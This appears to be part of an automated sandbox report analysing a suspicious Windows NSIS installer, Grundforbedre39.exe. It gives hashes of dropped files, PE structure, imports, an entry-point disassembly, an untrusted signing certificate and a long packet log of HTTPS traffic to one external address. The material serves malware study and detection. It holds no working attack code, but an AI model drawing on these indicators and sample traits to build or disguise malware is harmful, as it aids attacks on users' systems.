                                                                                    SHA-512:0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
                                                                                    Malicious:false
                                                                                    Preview:reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274661
                                                                                    Entropy (8bit):3.2513826448357057
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
                                                                                    MD5:9CB88B1AE7827818B29E20B15C82A937
                                                                                    SHA1:A60DFA07CBF65C96A3C7019D99452F138A12746E
                                                                                    SHA-256:445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
                                                                                    SHA-512:2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):272352
                                                                                    Entropy (8bit):3.2380792387673005
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
                                                                                    MD5:93A04CCDF51474B877C9414AE5AD2760
                                                                                    SHA1:1321C10A4CC69A33235C87ABF2779A57619533BB
                                                                                    SHA-256:D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
                                                                                    SHA-512:675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):207086
                                                                                    Entropy (8bit):3.2412864519720883
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
                                                                                    MD5:1171715CBB2206BFF607138FEF73877F
                                                                                    SHA1:D7059E4A741A345239A17FE037C8605D4219E28C
                                                                                    SHA-256:27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
                                                                                    SHA-512:69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):183776
                                                                                    Entropy (8bit):3.2465393215116713
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
                                                                                    MD5:B013C10185F365E645B1A8A4090DE5AF
                                                                                    SHA1:20F0178AD225AEC8785EA741E82729E6D816CEF0
                                                                                    SHA-256:0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
                                                                                    SHA-512:B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
                                                                                    Malicious:false
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.985402539382548
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Grundforbedre39.exe
                                                                                    File size:786'800 bytes
                                                                                    MD5:0190a49f09dc90c7dc61959581be1e9f
                                                                                    SHA1:af5d8cfa73b77d96d3a489f5961cdab87c8339be
                                                                                    SHA256:cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0
                                                                                    SHA512:a97c554093fbd30b39b921ce0c6ccf49b3f3bc3a2337a1d869788aa240b73e60e3f3a3d3a0d8f2441804ab58a1857618366fc02eea55650312f1f1de791a729c
                                                                                    SSDEEP:12288:LqLg193/433+TE58vkyFfgN5B8B/5FsfecVB0kh3ObwMB8aqEEbViGCyQRy1/6dy:Qg193w5uRa5BO5Fo9BbBoZyQqNbbfN/
                                                                                    TLSH:36F4232096826061F0E1D4B11FF7F753D93599E8C222EA1E1B711A79398DB02CB3637B
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@
                                                                                    Icon Hash:3d2e0f95332b3399
                                                                                    Entrypoint:0x40326a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:E=Facecloth218@Sagnomspunden79.Mel, O=Sciot, OU="Fundamentals Nonegotistic ", CN=Sciot, L=Philadelphia, S=Pennsylvania, C=US
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
Not Before:01/02/2024 01:07:33
Not After:31/01/2027 01:07:33
                                                                                    Subject Chain
                                                                                    • E=Facecloth218@Sagnomspunden79.Mel, O=Sciot, OU="Fundamentals Nonegotistic ", CN=Sciot, L=Philadelphia, S=Pennsylvania, C=US
                                                                                    Version:3
                                                                                    Thumbprint MD5:4893862384F04EBBAFDF562C827FD57D
                                                                                    Thumbprint SHA-1:20F3D03391507DDE89BEAB3C4CCCA40C9CECA43A
                                                                                    Thumbprint SHA-256:C354AA4AA0FC1F12A4BD219883E2C567C667EAA5CCA9F01389EF15AA52CFC295
                                                                                    Serial:58A8A66EDD4DDF633B143EC9BD20D65AE54B43F6
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 004092E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004070B0h]
                                                                                    call dword ptr [004070ACh]
                                                                                    cmp ax, 00000006h
                                                                                    je 00007F0344589A03h
                                                                                    push ebx
                                                                                    call 00007F034458CB44h
                                                                                    cmp eax, ebx
                                                                                    je 00007F03445899F9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004072B8h
                                                                                    push esi
                                                                                    call 00007F034458CABEh
                                                                                    push esi
                                                                                    call dword ptr [0040715Ch]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F03445899DCh
                                                                                    push ebp
                                                                                    push 00000009h
                                                                                    call 00007F034458CB16h
                                                                                    push 00000007h
                                                                                    call 00007F034458CB0Fh
                                                                                    mov dword ptr [00429204h], eax
                                                                                    call dword ptr [0040703Ch]
                                                                                    push ebx
                                                                                    call dword ptr [004072A4h]
                                                                                    mov dword ptr [004292B8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 004206A8h
                                                                                    call dword ptr [00407188h]
                                                                                    push 004092C8h
                                                                                    push 00428200h
                                                                                    call 00007F034458C6F8h
                                                                                    call dword ptr [004070A8h]
                                                                                    mov ebp, 00434000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F034458C6E6h
                                                                                    push ebx
                                                                                    call dword ptr [00407174h]
                                                                                    add word ptr [eax], 0000h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x67000 | 0xb48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xbe670 | 0x1b00 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5ff9 | 0x6000 | 34f0469eb860d5ecf0e52ef9d3820a60 | False | 0.6667073567708334 | data | 6.4734859396670705 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x13a4 | 0x1400 | 848ecd58951d0a4cfe8ec8cfce6b20d1 | False | 0.452734375 | data | 5.125569346027248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x202f8 | 0x600 | 3953dbb7217e7539ee75e90871f7aef9 | False | 0.4947916666666667 | data | 3.9050018847265378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x2a000 | 0x3d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x67000 | 0xb48 | 0xc00 | 737bf22e330f1bb677a1a75bfb3076c2 | False | 0.4215494791666667 | data | 4.359435247089545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x671c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
| RT_DIALOG | 0x674a8 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x675a8 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x676c8 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x67790 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x677f0 | 0x14 | data | English | United States | 1.2 |
| RT_MANIFEST | 0x67808 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Mar 18, 2024 14:47:27.857779980 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.861711025 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.861993074 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.862003088 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.862134933 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.866019011 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.866168022 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.866194963 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.866386890 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.870341063 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.870533943 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.870543003 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.870702028 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.874654055 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.874890089 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.876754999 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.876918077 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.876930952 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.877099037 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.881154060 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.881391048 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.881407022 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.881614923 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.885427952 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.885654926 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.885668039 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.885809898 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.889703989 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.889938116 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.889950037 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.890192986 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.894078970 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.894351006 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.894361973 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.894532919 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.898344040 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.898524046 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.898534060 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.898693085 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.902698040 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.902879000 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.902889967 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.903048038 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.906693935 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.906883001 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.906893969 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.907078028 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.910698891 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.910903931 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.910914898 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.911112070 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.914710999 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.914882898 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.914894104 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.915034056 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.918610096 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.918808937 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.918819904 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.919011116 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.922576904 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.922847033 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.922858000 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.923033953 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.926448107 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.926616907 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.928308010 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.928477049 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.928489923 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.928658962 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.932301998 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.932441950 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.932454109 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.932662010 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.936156988 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.936356068 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.936367035 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.936522007 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.938533068 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.938730955 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.938756943 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.938921928 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.940948009 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.941190004 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.941198111 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.941387892 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.943464994 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.943783998 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.943794966 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.944034100 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.946088076 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.946306944 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.946316957 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.946481943 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.948785067 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.948939085 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.948951006 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.949093103 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.950599909 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.950814962 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.951193094 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.951435089 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.952860117 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.953147888 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.953159094 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.953393936 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.955337048 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.955517054 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.955528021 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.955734015 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.957343102 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.957549095 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.957560062 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.957746029 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.959537983 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.959774971 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.960772038 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.960951090 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.960962057 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.961172104 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.962918043 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.963219881 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.963231087 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.963464975 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.964922905 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.965071917 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.965087891 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.965257883 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.967067003 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.967320919 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.967331886 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.967515945 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.969335079 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.969649076 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.969672918 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.969861984 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.971283913 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.971474886 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.971484900 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.971702099 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.973429918 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.973587990 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.973620892 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.973822117 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.975428104 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.975589037 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.975600958 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.975756884 CET49758443192.168.11.20142.250.65.161
